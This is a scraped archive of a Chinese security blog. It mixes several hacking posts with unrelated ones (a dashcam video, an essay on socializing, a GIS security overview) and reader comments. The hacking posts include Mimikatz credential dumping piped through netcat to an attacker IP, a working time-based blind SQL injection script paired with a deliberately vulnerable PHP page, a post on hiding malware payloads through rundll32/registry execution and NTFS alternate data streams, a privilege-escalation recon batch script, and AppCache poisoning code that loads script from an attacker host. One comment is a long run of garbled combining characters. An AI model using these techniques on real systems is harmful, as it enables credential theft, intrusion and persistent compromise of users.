ftp/nfs/samba:文件共享服务器,有时候会放一些软件,特别是公司内部员工的软件。拿下这些服务器,打入办公网络 ldap:很可能全内网权限管理的节点就在这里,就算只拿下一个员工的ldap用户权限,也是一个大突破 …… 留言评论(旧系统): 诚心找个师傅 @ 2015-10-07 09:08:45 痴迷黑客!求带入门!本人QQ312283874! 本站回复: 谨防上当受骗! -_-!!! 黑暗中的学习者 @ 2015-10-07 09:13:30 我想找个师傅!不求多牛只求带入门介绍入门方法也可以!不会经常打搅!希望能够实现!本人QQ312283874 本站回复: 谨防上当受骗! -_-!!! 学习者 @ 2015-10-07 09:15:13 我想找个师傅!不求多牛只求带入门介绍入门方法也可以!不会经常打搅!希望能够实现!本人QQ312283874 本站回复: 谨防上当受骗! -_-!!! 佚名 @ 2015-10-08 06:42:36 可以吗?求教 本站回复: -_-!!! 佚名 @ 2015-10-08 07:30:20 核总,跪求指导本人天天看C+Primer+Plus(第五版)中文版 看了各种TED演讲!各种论坛了解!求指引我想要专攻渗透! 本站回复: -_-!!! 呵呵 @ 2015-10-14 00:43:24 ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ 本站回复: ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎ 佚名 @ 2015-10-15 12:09:08 大神讨厌你不交我! 本站回复: -_-!!! 佚名 @ 2015-12-04 09:31:37 请在这里填写留言内容,最长不超过 1000 字。 本站回复: [暂无回复] 佚名 @ 2015-12-04 09:34:32 求带求带~邮箱content@gov.cn 本站回复: -_-!!!

2015/9/27
articleCard.readMore

Mimikatz 使用 Tips

Mimikatz 使用Tips Evi1cg (感觉自己萌萌哒) | 2015-09-17 16:42 1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器: Attacker执行: E:\>nc -lvp 4444 Victim执行: C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444 192.168.52.1 为Attacker IP 4.通过nc远程执行Mimikatz: Victim执行: C:\>nc -lvp 443 Attacker执行: E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe 192.168.52.128 为Victim IP [原文地址] 留言评论(旧系统): 佚名 @ 2016-02-28 00:32:01 非常有帮助, 本站回复: -_-!!!

2015/9/27
articleCard.readMore

一个获取windows系统信息的批处理脚本

@echo off echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo System Information >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt systeminfo | findstr /B /C:"OS" > System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Hostname >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt hostname >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Users>> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt net users >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Route table >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt route print >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Netstat INformation>> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt netstat -ano >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Firewall State >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt netsh firewall show state >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Firewall configuration >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt netsh firewall show config >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Scheduled tasks >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt schtasks /query /fo LIST /v >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo tasklist >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt tasklist /SVC >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo net start >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt net start >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo driverquery >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt DRIVERQUERY >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Wmic hotfix >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt wmic qfe get Caption,Description,HotFixID,InstalledOn >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo reg queries - elavated >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo reg queries - elavated >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt sc qc Spooler >> System_Details.txt accesschk.exe -ucqv Spooler >> System_Details.txt accesschk.exe -uwcqv "Authenticated Users" * >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo upnhosts - elavated >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt sc qc upnphost >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo End of Script >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt 留言评论(旧系统): xx @ 2015-09-27 12:36:08 我擦,都扒光了 本站回复: -_-!!! 佚名 @ 2015-10-09 20:17:15 给力呀.. 本站回复: -_-!!! 路人2016 @ 2016-02-16 09:16:24 大神 这是什么语言呀 怎么用呀 好高深 本站回复: 百度:批处理脚本

2015/9/27
articleCard.readMore

某行车记录仪一年中拍到的各种惊险奇趣瞬间

视频: 某行车记录仪一年中拍到的各种惊险奇趣瞬间 关键词:瞬间,行车记录仪,一年中,拍到的,各种,惊险,奇趣,突然变道,高速路,马路杀手 某行车记录仪 2014.09 - 2015.09 一年中拍到的各种惊险奇趣瞬间 包含的内容有: 1、前车高速错过出口,急刹变道,险撞。 2、雨夜无路灯的十字路口,险些迎面相撞。 3、半夜机场高速快车道逆行摩托,作死狂魔…… 4、…… 感谢观赏! 联系方式: web: https://lcx.cc/ mail: root@lcx.cc 珍惜生命,谨慎驾驶! 1080P高清原画下载: 某行车记录仪一年中拍到的各种惊险奇趣瞬间.mp4,497 MB (521,178,826 字节)。 相关内容: 马路杀手之:高速出口注意左侧直行车道车辆突然右转变道 留言评论(旧系统): 佚名 @ 2015-09-24 22:07:07 卧槽,高速公路的那个是找死啊。 本站回复: +1 佚名 @ 2015-09-25 09:04:13 其实这辆车就是核总的。。某个镜头之前曝过。。。 本站回复: 你赢了~ -_-!!! 尘缘 @ 2015-09-27 09:52:49 3:31分那个地方闪电真666 。别的没遇到过 就是逆行最膈应人 每次上下班我小区附近特备多逆行的大妈 附近又是高峰期的路段 真担心她们. 本站回复: +1,珍爱生命,谨慎驾驶~ 卑鄙 @ 2015-10-03 00:37:00 - -核总你驾照花钱买的吧?主路上你贴边走,单双小道你反而又贴中间去了- - 右转车道你非要直行贴边- -、、 以后上路看到你的车,要躲远了点了。。 本站回复: 科目1-4满分,路过…… xxoo @ 2015-10-15 10:45:54 原來核總在西安 本站回复: 欢迎来西安~ 逸笙 @ 2015-10-30 08:36:56 开车好危险,上次就差点跟人家顶上 本站回复: 珍惜生命,谨慎驾驶! 佚名 @ 2015-11-04 14:13:48 那个从旁边蹿出来的环卫车真脑残,还有左拐不看路的摩托。 不过核总你开的我脚着也有点小毛病吧 - -,第二个错过高速口的那个,前车你看他踩刹车了,你也就不能踩油门了哦。 顶!d=====( ̄▽ ̄*)b 还是慢点驾驶好 核总声音真萌,完全消除了我对核总是山东大汉型的认识 = = 那么问题来了:2分35秒时,飞出的那个轮胎到底是谁的? 本站回复: 第二个错过高速口的那个,当时没有注意前方,在注意右后侧。 那是路过的坦克掉的轮胎……

2015/9/24
articleCard.readMore

放弃那些无用的社交

那年我一个人来到北京,带上父亲跟我说的一句话:多交朋友。 于是,上大学时,我酷爱社交,参加了三个社团,只要有活动,都会去打个酱油。我乐意留别人的电话,曾几何时,我把留到别人电话数量当成炫耀的资本。 我待人热情,对人诚恳,却总是被忽略。他们只有在打杂的时候,才会想到这个社团还有一个我。那段时间,虽然很多场合都有我的存在,但永远不是核心,别人也不太愿意跟我交朋友。 可活动后,留下打扫卫生的,永远是我。 一次,认识了学校的一个老师,那年我还是个学生,屁颠屁颠的大半夜去他办公室,只是因为他给我说了,晚上他一个人在办公室值班。 我听他跟我聊了很久,没有深聊,只是表面肤浅的交流了十几分钟,他告诉我,他是负责学校入党工作的。 我听的很认真,临走前留下了他的电话,还送了带来了的两袋水果。 后来我入党写申请书,那时不知道可以在网上下模板,傻里吧唧的发短信找他帮忙,他却冷冷的回了一条:我没空。 其实我在很多场合都遇到过了这样的拒绝,你以为你和对方留了电话存了微信,应该彼此能帮忙,却忘记了一件很重要的事情:只有关系平等,才能互相帮助。 这个故事没完。 几年后,我已经是一名英语老师,深夜接到了一个电话,正是几年前的那位老师。 他笑嘻嘻的跟我寒暄了两句,很快就聊到了正题:竟然是找我介绍靠谱的英语老师,希望私下能给他的孩子上一节课。 那段时间,我每天都在上课,白天劳累困顿,晚上晕头转向,加上想到过去的种种,于是我只是搪塞了,改天我看看,就匆匆挂了电话。 当然,我什么也没帮他。 后来我忽然想到这件事,为什么我没有帮他,或者说,很久以前,他为什么不肯帮助我。 答案很简单,除去彼此的感情,能让对方帮自己的根本条件,是你能提供等价的回报。换句话说,过去我是个学生,没法给他提供等价回报;而之后我不需要入党,他也没法给我提供等价回报。 而且,我们的感情基础是零。 事实很冷,但这是事实。 我们总是去参加社交,却不知道,很多社交其实并没有什么用,看似留了别人电话,却在需要帮助的时候,仅仅是白打了一个电话。 因为我们不够优秀。 很残忍,但谁愿意帮助一个不优秀的人呢。 曾有个朋友跟我说,我参加了不少社交,朋友也不少,为什么会越来越孤单,直到今天,很多事情都无人帮助我,难过。 我问她,社交场上,别人一般怎么介绍我。 她说,我的朋友,小白。 我说,一般怎么介绍那些优秀的人? 她说,独立撰稿人、主播、导演、教授... ...某某某。 我说,所以你懂了,如果你自己不强大,那些社交其实没有什么用,只有等价的交换,才能得到合理的帮助。 所以,在你还没有足够强大足够优秀的时候,先别花太多那些宝贵的时间去社交,先花点时间读读书提升一下专业技能。我们都有过参加一个聚会发现无话可说甚至不知道做一些什么的经历,因为,这个群体,不属于你。 要知道,只有优秀的人,才能得到有用的社交。 几个月后,小白参加一个电视栏目大火,现在她依旧喜欢参加社交活动,她告诉我,现在甚至有些人每天给她每天分享一些文字,还有些是之前不喜欢理我的人。 一个当红作家曾经给我说过一个故事,他成名之前,给一个很大的报社投过稿,可是,多次发稿,却石沉大海。 一年后,他的书大卖,这家报社的创始人竟然亲自来找他约稿。 他们关系很好,因为一个需要卖书,一个需要发有质量的文字。有人说他和这个报社的关系好,他只说了一句话: “等价的交换,才有了等价的友谊。” 别觉得世界残酷,这就是游戏规则,别着急痛苦这世界冰冷冷的像一块铁,请看完我的文字。 我在北京打拼的第一年,一无所有,可每周的都会有一个朋友来看我,给我送吃的,那哥们叫立冬,是我最好的朋友。 他曾经说,无论你是谁,但你是我兄弟。 后来我有点名气了,他依旧跟我说,别以为你是谁,你就是我兄弟。 这种人,被称为真朋友,他不适用于以上的规则。无论什么时候,他都愿意帮助你,无论你贫穷还是窝囊,因为你们共同经历过一些事情,他们总是不离不弃。你们的帮助,不用等价交换,只用感情平等,就好。 这种人不用多,在这个浮夸的世界里,几个就好。 所以,放弃那些无用无效的社交,提升自己,才能让世界变得更大。同时,相信世界上美好的友情,存在于彼此内心深处,安静的保守着他们。 (文/李尚龙) 作者简介:李尚龙,青年导演、编剧、作家,原新东方教师,代表作《你只是看起来很努力》。微博@尚龙老师,公众号:龙影部落(ID:lslmoviegoers)。 留言评论(旧系统): 佚名 @ 2015-09-18 18:35:40 作者简介:李尚龙,青年导演、编剧、作家,原新东方教师,代表作《你只是看起来很努力》。微博@尚龙老师,公众号:龙影部落(ID:lslmoviegoers) 好详细。如果是写XXX文章作者是不是这个B就不火了啊?哈哈 本站回复: -_-!!! 佚名 @ 2015-09-20 20:50:30 牙啊嘎嘎司空见惯是我今生的 本站回复: [暂无回复] 小锋 @ 2015-09-21 13:40:14 6666666666 本站回复: -_-!!! Dicky @ 2015-09-21 14:14:28 竟然看成了 放弃那些无用的社工 本站回复: -_-!!! 佚名 @ 2015-09-21 16:39:05 我也看成了社工。 本站回复: -_-!!! 尘缘 @ 2015-09-22 20:18:04 我刚知道这个地方可以打广告 是真的吗? 试试 欢迎大牛移步http://www.moxcn.com 本站回复: -_-!!! 狼狼恶狗 @ 2015-09-23 09:11:53 放弃那些无用的性交,吓我一跳 本站回复: -_-!!! aaa @ 2015-10-05 16:50:47 看了前面,我的感觉就是,,以后没有朋友了,好伤心,看了后面发现,除了家人,真不知道还有谁可以做到这样不离不弃。 本站回复: -_-!!! cain @ 2015-10-26 14:23:15 这个写的真心好,我还以为是您老人家写的呢,结果不是,,,, 可否转载? 本站回复: 欢迎转载!版权归原作者所有!

2015/9/18
articleCard.readMore

未来可能的安全焦点:GIS地理信息系统安全问题分析

引文:近几年,工控安全问题已经逐渐进入人们的视线中,与此同时,GIS安全问题或许会在未来成为一大安全焦点。本文将会简述GIS在地理学中的内容,而着重于GIS系统的Web安全等问题进行分析,希望本文能起到抛砖引玉的作用,让更多安全人士,GIS系统开发者以及用户能够关注到这一领域。 一.解读GIS GIS(即地理信息系统,Geographic Information System)属于地理信息技术,结合地理学和计算机科学,已经广泛的应用在不同的领域,是用于输入、存储、查询、分析和显示地理数据的系统,GIS是一种基于计算机的工具,它可以对空间信息进行分析和处理(简而言之,是对地球上存在的现象和发生的事件进行成图和分析)。 GIS 技术把地图这种独特的视觉化效果和地理分析功能与一般的数据库操作(例如查询和统计分析等)集成在一起。(结合百度) GIS系统举例: 这个广西动物疫病预防控制中心的GIS系统 从图中可以看出,结合了可变的地图,可以更快的了解到各地区出现的疫情情况并进行及时处理。同时,系统自带的预警系统和数据分析可以更高效,简便的帮助动物疫病预防控制中心进行工作。 GIS系统实现过程简述: GIS系统涉及领域: 自然方面——灾难预测,区域环境变化(台风,降水等) 人文社会——人口统计,经济分析,教育资源分布等 以及军事,医疗等众多领域 粗陋的理解是,GIS是一种结合地图与数据的信息系统(有地图,有数据的。。) 二.Web安全中的GIS 笔者通过漏洞挖掘,以及在乌云收集到的漏洞案例,按照GIS系统类型和漏洞类型对目前GIS安全在Web安全中的问题做出了归纳。方便大家能够看到当前的一些GIS系统的安全现状   三.GIS安全问题总结 在中国,GIS系统还处在普及阶段,许多人找到GIS系统漏洞后,却完全不了解这一系统的作用,甚至认为GIS只是普通的三个字符。对于GIS开发者,很多Web端的GIS系统存在着明显的漏洞,对于用户,在使用系统时大多使用了弱口令,GIS安全问题确实需要我们重视。相信在未来,随着物联网,云时代的普及,会有更多诸如110报警系统,救援系统应用到了GIS,那是GIS安全问题将成为一大安全焦点。 本文虽然有些管中窥豹之处,但是所有技术不都是在不断完善中而完美的么?也真因如此,人们手中的一个细管,变成了望远镜。 最后感谢乌云平台提供的漏洞支持,以及所有为GIS安全做出过贡献的白帽子们。 [原文地址] 留言评论(旧系统): 酱油先生 @ 2015-09-11 22:27:02 上次有人给我个天津某出租车公司车辆管理GPS系统 没敢深入 是SQL注射漏洞 估计是写这个系统的人安全意识不够 本站回复: -_-!!! 佚名 @ 2015-09-14 15:52:43 借这个地方 问问 freebuf 是不是有漏洞 还是? 不用登陆 帖子就可以 回复 “用户名 邮箱 内容...” 试了别的帖子 "换个用户名" 同样 也可以回复 本站回复: 匿名留言,和登录的不一样。 日进斗金 @ 2015-09-17 19:23:18 GIS系统 特别是政府机关的 60%都是弱口令问题。举例子 去年挖的某地的一个水库GIS 现在密码还是123456......... 本站回复: +1 手机回收网 @ 2015-09-18 14:45:14 宅急收专业正规手机回收网:http://www.zhaijis.com/ 本站回复: 你这是在打广告吗?

2015/9/10
articleCard.readMore

python延迟注入

#!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): def __init__(self, str,x): threading.Thread.__init__(self) self.str = str self.x = x def run(self): global res x=self.x j = self.str url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23" html = request(url) verify = 'timeout' if verify not in html: res[str(j)] = 0 #print 1 else: res[str(j)] = 1 def request(URL): user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req,timeout=2) except Exception ,e: time.sleep(2) return 'timeout' return request.read() def curl(url): try: start = time.clock() requests.get(url) end = time.clock() return int(end) except requests.RequestException as e: print u"访问出错!" exit() def getLength(): i = 0 while True: print "[+] Checking: %s \r" %i url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23" html = request(url) verify = 'timeout' if verify in html: print u"[+] 数据长度为: %s" %i return i i = i + 1 def bin2dec(string_num): return int(string_num, 2) def getData(dataLength): global res data = "" for x in range(dataLength): x = x + 1 #print x threads = [] for j in range(8): result = "" j = j + 1 sb = my_threading(j,x) sb.setDaemon(True) threads.append(sb) #print j for t in threads: t.start() for t in threads: t.join() #print res tmp = "" for i in range(8): tmp = tmp + str(res[str(i+1)]) #print chr(bin2dec(tmp)) res = {} result = chr(bin2dec(tmp)) print result data = data + result sb = None print "[+] ok!" print "[+] result:" + data if __name__ == '__main__': stop = False res = {} length = getLength() getData(length) <?php /* * 延迟注入测试 */ header("Content-type:text/html;charset=utf8"); $link = mysql_connect("localhost", "root",""); mysql_select_db("mysql", $link); mysql_set_charset("utf8"); $sql = "SELECT user FROM user where user='{$_GET['username']}'"; echo $sql; $query = mysql_query($sql); echo "这是一个没有任何回显的注入点"; ?> [原文地址]

2015/9/10
articleCard.readMore

Payload隐藏技巧交流

整理一下payload隐藏的相关技巧,也想向大家学习一下更好的经验思路:) 0x00 目标: 维持对目标主机的控制权限 0x01 要求: 尽最大程度减少在目标windows主机留下文件,降低被发现被捕获样本的概率 0x02 方法: 1、伪造文件后缀名 使用不常见的后缀名,藏于系统的某个角落 分析: 最简单直接的办法,但被发现的概率也最大 2、插入正常文件 将payload保存到系统正常文件的中间或者尾部 分析: 比方法1高级一些,复杂度+1,没有单独生成文件,隐蔽性+2 3、藏于注册表 将payload加密存于注册表 分析: 易被监控,隐蔽性-1,但poweliks的运用使该项技术创新性+2 poweliks简介: 2014年8月左右出现 XCon2015《应用层持久化攻击技术》也对此做了介绍 特点: 将payload保存为非ASCII字符,无法被注册表正常读取 运行代码方式: (1)直接执行jscript rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo'); (2)读取注册表payload并执行 HKCU\\software\\microsoft\\windows\\currentversion\\run\\ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") 补充: 一个加密jscript的网站:http://tool.lu/js/ 4、ADS (供选数据流/ alternate data stream) 将payload存入正常文件的ADS中 分析: 适用于长度较小的payload,常用来执行vbs、Powershell脚本,效率+1,实现难度-1 常用命令: 列出文件ADS dir /r test.txt type nc.exe > test.txt:nc.exe echo Dim objShell:Set objShell = WScript.CreateObject("WScript.Shell"):command = "cmd /C for /f ""delims=,"" %i in (C:\\test\\test.txt:1) do %i":objShell.Run command, 0:Set objShell = Nothing > test.txt:run.vbs 5、wmibackdoor 将payload存入WMI Class中,详情见drops链接:http://drops.wooyun.org/tips/8260 分析: 该方法目前普及不高,检测方法也很单一,所以payload放在这里隐蔽性+3 6、Steganography 隐写术,将payload存到图片中,甚至可以伪造windows中的默认图片 分析: 隐写术由来已久,但门槛很高,复杂度+1,因此检测成本也很高,隐蔽性+3 下图存入了我的payload,如果有兴趣的同学解密出来送他wb:) 0x03 小结 ring0下隐藏未涉及,愿意分享的同学也送你wb:) 如果发现我的理解有误,请及时指出~ 希望大家把思路分享出来,共同学习共同进步~ [原文地址] 留言评论(旧系统): 佚名 @ 2015-10-22 00:28:11 试了好几个软件,没有解出来您图片中的信息,555. 能告诉我怎么做的吗? 本站回复: 哈哈哈,继续加油!

2015/9/10
articleCard.readMore

利用 Appcache 和 ServiceWorker 进行持久型session hijacking 和 XSS

利用 Appcache 和 ServiceWorker 进行持久型session hijacking 和 XSS 小饼仔 | 2015-08-20 14:52 看了篇文章 Using Appcache and ServiceWorker for Evil,讲的是黑下服务器后,通过 Middlekit 技术,污染每个访问者的浏览器cache,通过这个方法,我们能够改变请求的响应,将请求代理到我们的server,造成持久的session hijacking 和 XSS。 PS:老外思路确实猥琐! 翻译或理解有误,欢迎指出~ 下面是示意图 文件具体介绍了浏览器下两种攻击方法 - 利用浏览器的 Appcache 造成持久的cache poisoning - 利用ServiceWorker 来更改所有请求的响应(Chrome下) AppCache 简单介绍 随着移动互联网越来越普及, 在移动端采用web技术解决跨平台、快速部署、快速发布的方案也越来越多。 但对于web方式实现的app又面临者网络的强依赖,对网速和流量有较高要求,针对此问题html提出了AppCache方案, 用于解决web离线缓存问题 AppCache详细介绍可以参考HTML5 AppCache机制分析 理解了AppCache的原理,后面的会好理解些 影响范围:Appcache在所有新版浏览器中都得到了支持,参考 http://caniuse.com/#search=appcache 首先说一下示例代码大体思路: 1. 首先在server上添加一个路由请求 /a.appcache 请求返回内容为浏览器需要缓存的页面路径等信息,需要有一定格式 并设置响应头 response.headers['cache-control'] = 'max-age=3155760000' # 缓存超时时间 response.headers['content-type'] = 'text/cache-manifest; charset=UTF-8' #表明是cache-manifest文件 <html manifest='/a.appcache'> require 'sinatra' # 替换响应内容 wire = lambda do if params[:utm_medium] r= "real content" else r=<<HTML <html manifest='/a.appcache'> <script src="https://evil.com.site/middlekit.js"></script> <script> function load(url){ x=new XMLHttpRequest; x.open('get',url); x.setRequestHeader('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'); x.setRequestHeader('Cache-Control','max-age=0'); x.setRequestHeader('Upgrade-Insecure-Requests','1'); x.send(); x.onreadystatechange=function(){ if(x.readyState==4){ document.write(x.responseText); //document.body.parentElement.innerHTML = x.responseText; } } } if(location.href.indexOf("?") != -1){ var u = location.href + "&utm_medium=1"; }else{ var u = location.href + "?utm_medium=1"; } //history.pushState("","",url); console.log("Infected") load(u); </script> </html> HTML end r end # 路由path pages = %w{/ /reconnect /lengthextension /logindemo /peatio.pdf /stealtitle /blog/2015/03/15/authy_bypass.html /blog/2015/03/03/duo_format_injection.html /blog/2015/07/28/appcache.html /blog/2015/03/10/Profilejacking.html 